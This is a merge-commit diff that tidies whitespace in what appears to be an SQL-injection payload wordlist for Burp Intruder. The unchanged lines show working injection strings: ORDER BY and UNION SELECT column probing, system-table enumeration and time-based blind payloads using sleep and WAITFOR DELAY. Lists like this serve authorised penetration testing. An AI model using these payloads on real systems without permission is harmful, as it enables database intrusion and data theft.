Merge pull request #287 from beomsu317/master

Update SQL-Injection

SQL Injection/Intruder/SQL-Injection

@@ -29,11 +29,8 @@
 +		addition, concatenate (or space in url)
 ||		(double pipe) concatenate
 %		wildcard attribute indicator
-
 @variable	local variable
 @@variable	global variable
-
-
 # Numeric
 AND 1
 AND 0
@@ -43,44 +40,27 @@ AND false
 1-true
 1*56
 -2
-
-
 1' ORDER BY 1--+
 1' ORDER BY 2--+
 1' ORDER BY 3--+
-
 1' ORDER BY 1,2--+
 1' ORDER BY 1,2,3--+
-
 1' GROUP BY 1,2,--+
 1' GROUP BY 1,2,3--+
 ' GROUP BY columnnames having 1=1 --
-
-
 -1' UNION SELECT 1,2,3--+
 ' UNION SELECT sum(columnname ) from tablename --
-
-
 -1 UNION SELECT 1 INTO @,@
 -1 UNION SELECT 1 INTO @,@,@
-
 1 AND (SELECT * FROM Users) = 1	
-
 ' AND MID(VERSION(),1,1) = '5';
-
 ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
-
-
 Finding the table name
-
-
 Time-Based:
 ,(select * from (select(sleep(10)))a)
 %2c(select%20*%20from%20(select(sleep(10)))a)
 ';WAITFOR DELAY '0:0:30'--
-
 Comments:
-
 #	    Hash comment
 /*  	C-style comment
 -- -	SQL comment